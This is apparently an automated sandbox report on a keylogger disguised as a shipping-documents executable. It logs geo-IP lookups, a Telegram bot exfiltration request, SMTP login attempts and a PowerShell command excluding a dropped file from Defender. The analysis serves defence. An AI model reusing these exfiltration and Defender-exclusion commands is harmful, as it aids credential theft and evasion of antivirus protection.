2025-01-09 14:08:07 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 14:08:07 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1746476 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zhw9qTD8DtxwBSktIayFyaEPBTl8x5hPNIqOTroIeWvNM%2FBc3ugxH2N%2BWido4hz7C4jeU0%2FB%2FT0IelsB0ZBhHqsXrl2IoGg%2BpnvcL6CX6vj6X5sGZ9OMVOMbNk9Viqtr2wIvycJk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ff5c1b7942d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1561&rtt_var=628&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1683967&cwnd=229&unsent_bytes=0&cid=de6f6bfbf7cff269&ts=179&x=0"
2025-01-09 14:08:07 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49715	104.21.80.1	443	6300	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 14:08:08 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 14:08:08 UTC	853	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 14:08:08 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1746477 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mUt1yNmDXJV1Q1Nx%2FnsdQGI6xOKl6RRaByTxgy0LOTHnW9ZmeC0uwbasCMTN777AYMx7plylZwL3rMPvhIEwtGwiFUvaN3KT3GclMyubMsuhu17uDp76caSn8%2Bt1GCNffOWtq6dd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ff654feb8c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2039&min_rtt=2027&rtt_var=785&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1373471&cwnd=223&unsent_bytes=0&cid=ef7ef16d05df1d14&ts=156&x=0"
2025-01-09 14:08:08 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49717	104.21.80.1	443	6300	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 14:08:09 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 14:08:09 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 14:08:09 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1746478 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wd8e0O8MKFi1N0oMRoUfaPrm3TyRau5QNXNHQpqr7cRayOCuSaPXyF4qwcoYo9SJ%2FZyn3RksC8%2FzBKhW48rjVtBuaLkCM3lvyuiOjoXCmoT57b6r3FHddHRPWuqb6071ITr%2FDBes"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ff6d7e1443ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1833&min_rtt=1759&rtt_var=712&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1660034&cwnd=225&unsent_bytes=0&cid=63715cfe4d4ccaab&ts=155&x=0"
2025-01-09 14:08:09 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49719	104.21.80.1	443	6300	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 14:08:11 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-09 14:08:11 UTC	864	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 14:08:11 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1746480 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jpl9jtY4bZDx3X2rETu4vYz5j%2BQOTy1pdkaWgAHttATVb0B5eyduv2g15wGTm4zpkIRbWO7LI%2BVOcNgl%2Bc3%2FAjxdSe0QsVHCGYaK6M6Kt2t0m%2FBwTE%2BpL1Gj%2FQZeJk3TAgoqLBsa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ff75accd8c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4533&min_rtt=2051&rtt_var=2456&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1423695&cwnd=223&unsent_bytes=0&cid=6a42cca1637c5d83&ts=173&x=0"
2025-01-09 14:08:11 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49721	104.21.80.1	443	6300	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 14:08:12 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 14:08:12 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 14:08:12 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1746481 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DjbOkoUSrprdDxuqO6XfCG4gw%2BE38aV38ZLBzjXa%2B1vRMc8Gy9h2%2BluD8AhcbQl6M49NG3nxJX10%2F77l2XkMM333Was%2Bhki09wGj6YkCeQXnGH2nlvK4iAC112L3oOeJiBDEOfLE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ff7ddd327d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1937&min_rtt=1930&rtt_var=738&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1469552&cwnd=244&unsent_bytes=0&cid=b82f0791806e96ab&ts=152&x=0"
2025-01-09 14:08:12 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49723	104.21.80.1	443	6300	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 14:08:13 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 14:08:13 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 14:08:13 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1746482 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QrTDm%2BxCdcOl8Ab43UTQPt%2BHN8MV8VSyoecsXF5X20Qrz6KwxTs%2B%2BgYjPi9lsIct9h2eOFxfTCunlIJ6LKPCn975b%2BdrEWD5tEWgUMXFPM8cZyKsNWb3ZJ2VQsvGaO1kuLr7csMe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ff861ce6c443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1640&rtt_var=643&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1664766&cwnd=244&unsent_bytes=0&cid=e699ec0fdbff7e19&ts=161&x=0"
2025-01-09 14:08:13 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49725	104.21.80.1	443	6300	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 14:08:15 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 14:08:15 UTC	853	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 14:08:15 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1746484 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uIhdwZqBU3Az1z7O8tkr1fQBsLuvmCa8hNzOSVO%2BYAOKlQoLOCS52MhYFrqxUrEHJiW%2FHCYj1LbCROttWDR2wrek1gDd2PWOaSyiIMjvNervhoaYG7oxPZ2A23wcmurYis73cYkp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ff8e7ebfc443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1700&rtt_var=654&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1650650&cwnd=244&unsent_bytes=0&cid=638db9037b3e90e9&ts=148&x=0"
2025-01-09 14:08:15 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49726	149.154.167.220	443	6300	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 14:08:15 UTC	345	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2009/01/2025%20/%2022:02:41%0D%0ACountry%20Name:%20United%20States%0D%0A[%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-09 14:08:16 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 14:08:15 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-09 14:08:16 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 9, 2025 15:08:22.979424953 CET	587	49766	208.91.199.223	192.168.2.5	220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 9, 2025 15:08:22.979646921 CET	49766	587	192.168.2.5	208.91.199.223	EHLO 585948
Jan 9, 2025 15:08:23.128880978 CET	587	49766	208.91.199.223	192.168.2.5	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Jan 9, 2025 15:08:23.130172968 CET	49766	587	192.168.2.5	208.91.199.223	AUTH login ZGlyZWN0b3JAaWdha3Vpbi5jb20=
Jan 9, 2025 15:08:23.281904936 CET	587	49766	208.91.199.223	192.168.2.5	334 UGFzc3dvcmQ6
Jan 9, 2025 15:08:23.439059973 CET	587	49766	208.91.199.223	192.168.2.5	235 2.7.0 Authentication successful
Jan 9, 2025 15:08:23.439390898 CET	49766	587	192.168.2.5	208.91.199.223	MAIL FROM:<director@igakuin.com>
Jan 9, 2025 15:08:23.589921951 CET	587	49766	208.91.199.223	192.168.2.5	250 2.1.0 Ok
Jan 9, 2025 15:08:23.590280056 CET	49766	587	192.168.2.5	208.91.199.223	RCPT TO:<director@igakuin.com>
Jan 9, 2025 15:08:23.753628969 CET	587	49766	208.91.199.223	192.168.2.5	550 5.4.6 <director@igakuin.com>: Recipient address rejected: Email Sending Quota Exceeded
Jan 9, 2025 15:08:25.824188948 CET	587	49784	208.91.199.223	192.168.2.5	220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 9, 2025 15:08:25.824338913 CET	49784	587	192.168.2.5	208.91.199.223	EHLO 585948
Jan 9, 2025 15:08:25.980206013 CET	587	49784	208.91.199.223	192.168.2.5	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Jan 9, 2025 15:08:25.980406046 CET	49784	587	192.168.2.5	208.91.199.223	AUTH login ZGlyZWN0b3JAaWdha3Vpbi5jb20=
Jan 9, 2025 15:08:26.132090092 CET	587	49784	208.91.199.223	192.168.2.5	334 UGFzc3dvcmQ6
Jan 9, 2025 15:08:26.285197973 CET	587	49784	208.91.199.223	192.168.2.5	235 2.7.0 Authentication successful
Jan 9, 2025 15:08:26.285376072 CET	49784	587	192.168.2.5	208.91.199.223	MAIL FROM:<director@igakuin.com>
Jan 9, 2025 15:08:26.435837984 CET	587	49784	208.91.199.223	192.168.2.5	250 2.1.0 Ok
Jan 9, 2025 15:08:26.435991049 CET	49784	587	192.168.2.5	208.91.199.223	RCPT TO:<director@igakuin.com>
Jan 9, 2025 15:08:26.612903118 CET	587	49784	208.91.199.223	192.168.2.5	550 5.4.6 <director@igakuin.com>: Recipient address rejected: Email Sending Quota Exceeded

Target ID:	0
Start time:	09:08:00
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe"
Imagebase:	0x120000
File size:	785'408 bytes
MD5 hash:	0368A9AA7437BAC59B4253ABD5F99818
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.4530259452.0000000002451000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4530259452.00000000024CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.4530259452.00000000024CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.4530259452.00000000024CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	09:08:01
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe"
